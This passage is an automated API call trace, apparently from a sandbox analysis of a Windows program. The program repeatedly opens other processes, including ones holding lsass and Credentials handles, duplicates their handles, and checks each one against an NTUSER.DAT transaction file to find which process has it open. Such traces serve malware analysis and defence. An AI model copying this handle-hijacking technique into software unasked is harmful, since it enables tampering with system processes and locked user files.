dwProcessId=0x1e0) returned 0x1e8 [0163.979] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.980] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.981] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.981] CloseHandle (hObject=0x1e4) returned 1 [0163.981] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0163.981] CloseHandle (hObject=0x194) returned 1 [0163.981] CloseHandle (hObject=0x1e8) returned 1 [0163.981] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.981] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.982] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.983] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.983] CloseHandle (hObject=0x1e4) returned 1 [0163.983] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.983] CloseHandle (hObject=0x194) returned 1 [0163.983] CloseHandle (hObject=0x1e8) returned 1 [0163.983] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.983] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.984] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.985] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.985] CloseHandle (hObject=0x1e4) returned 1 [0163.985] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0163.985] CloseHandle (hObject=0x194) returned 1 [0163.985] CloseHandle (hObject=0x1e8) returned 1 [0163.985] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.985] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.986] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.987] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.987] CloseHandle (hObject=0x1e4) returned 1 [0163.987] CloseHandle (hObject=0x194) returned 1 [0163.987] CloseHandle (hObject=0x1e8) returned 1 [0163.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.987] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.988] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.989] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.989] CloseHandle (hObject=0x1e4) returned 1 [0163.989] CloseHandle (hObject=0x194) returned 1 [0163.989] CloseHandle (hObject=0x1e8) returned 1 [0163.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.989] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.990] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.991] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.991] CloseHandle (hObject=0x1e4) returned 1 [0163.991] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0163.991] CloseHandle (hObject=0x194) returned 1 [0163.991] CloseHandle (hObject=0x1e8) returned 1 [0163.991] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.991] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.992] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.993] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.993] CloseHandle (hObject=0x1e4) returned 1 [0163.993] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0163.993] CloseHandle (hObject=0x194) returned 1 [0163.993] CloseHandle (hObject=0x1e8) returned 1 [0163.993] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.993] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.994] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.995] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.995] CloseHandle (hObject=0x1e4) returned 1 [0163.995] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0163.995] CloseHandle (hObject=0x194) returned 1 [0163.995] CloseHandle (hObject=0x1e8) returned 1 [0163.995] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.995] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.996] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.997] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.997] CloseHandle (hObject=0x1e4) returned 1 [0163.997] CloseHandle (hObject=0x194) returned 1 [0163.997] CloseHandle (hObject=0x1e8) returned 1 [0163.997] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.997] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.998] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.999] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.999] CloseHandle (hObject=0x1e4) returned 1 [0163.999] CloseHandle (hObject=0x194) returned 1 [0163.999] CloseHandle (hObject=0x1e8) returned 1 [0163.999] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0163.999] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.000] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.001] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.001] CloseHandle (hObject=0x1e4) returned 1 [0164.001] CloseHandle (hObject=0x194) returned 1 [0164.001] CloseHandle (hObject=0x1e8) returned 1 [0164.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0164.001] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.001] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.002] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.002] CloseHandle (hObject=0x1e4) returned 1 [0164.002] CloseHandle (hObject=0x194) returned 1 [0164.002] CloseHandle (hObject=0x1e8) returned 1 [0164.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0164.003] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x838, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.003] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.004] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.004] CloseHandle (hObject=0x1e4) returned 1 [0164.004] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.004] CloseHandle (hObject=0x194) returned 1 [0164.004] CloseHandle (hObject=0x1e8) returned 1 [0164.004] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.004] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.005] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.006] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.006] CloseHandle (hObject=0x1e4) returned 1 [0164.006] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.006] CloseHandle (hObject=0x194) returned 1 [0164.006] CloseHandle (hObject=0x1e8) returned 1 [0164.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.006] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.007] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.008] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.008] CloseHandle (hObject=0x1e4) returned 1 [0164.008] CloseHandle (hObject=0x194) returned 1 [0164.008] CloseHandle (hObject=0x1e8) returned 1 [0164.008] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.008] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.009] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.010] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.010] CloseHandle (hObject=0x1e4) returned 1 [0164.010] CloseHandle (hObject=0x194) returned 1 [0164.010] CloseHandle (hObject=0x1e8) returned 1 [0164.010] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.010] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.011] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.012] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.012] CloseHandle (hObject=0x1e4) returned 1 [0164.012] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.012] CloseHandle (hObject=0x194) returned 1 [0164.012] CloseHandle (hObject=0x1e8) returned 1 [0164.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.012] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.013] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.014] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.014] CloseHandle (hObject=0x1e4) returned 1 [0164.014] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.014] CloseHandle (hObject=0x194) returned 1 [0164.014] CloseHandle (hObject=0x1e8) returned 1 [0164.014] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.014] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.014] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.015] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.016] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.016] CloseHandle (hObject=0x1e4) returned 1 [0164.016] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.016] CloseHandle (hObject=0x194) returned 1 [0164.016] CloseHandle (hObject=0x1e8) returned 1 [0164.016] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0164.016] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.017] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.017] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.017] CloseHandle (hObject=0x1e4) returned 1 [0164.017] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.017] CloseHandle (hObject=0x194) returned 1 [0164.018] CloseHandle (hObject=0x1e8) returned 1 [0164.018] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.018] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.018] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.019] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.019] CloseHandle (hObject=0x1e4) returned 1 [0164.019] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.019] CloseHandle (hObject=0x194) returned 1 [0164.019] CloseHandle (hObject=0x1e8) returned 1 [0164.019] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.019] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.020] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.021] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.021] CloseHandle (hObject=0x1e4) returned 1 [0164.021] CloseHandle (hObject=0x194) returned 1 [0164.021] CloseHandle (hObject=0x1e8) returned 1 [0164.021] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.021] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.022] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.025] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.025] CloseHandle (hObject=0x1e4) returned 1 [0164.025] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0164.025] CloseHandle (hObject=0x194) returned 1 [0164.026] CloseHandle (hObject=0x1e8) returned 1 [0164.026] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.026] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.026] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.027] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.027] CloseHandle (hObject=0x1e4) returned 1 [0164.027] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0164.027] CloseHandle (hObject=0x194) returned 1 [0164.027] CloseHandle (hObject=0x1e8) returned 1 [0164.027] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.028] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.028] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.029] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.029] CloseHandle (hObject=0x1e4) returned 1 [0164.029] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0164.029] CloseHandle (hObject=0x194) returned 1 [0164.029] CloseHandle (hObject=0x1e8) returned 1 [0164.029] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.029] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.030] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.031] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.031] CloseHandle (hObject=0x1e4) returned 1 [0164.031] CloseHandle (hObject=0x194) returned 1 [0164.031] CloseHandle (hObject=0x1e8) returned 1 [0164.031] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0164.032] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 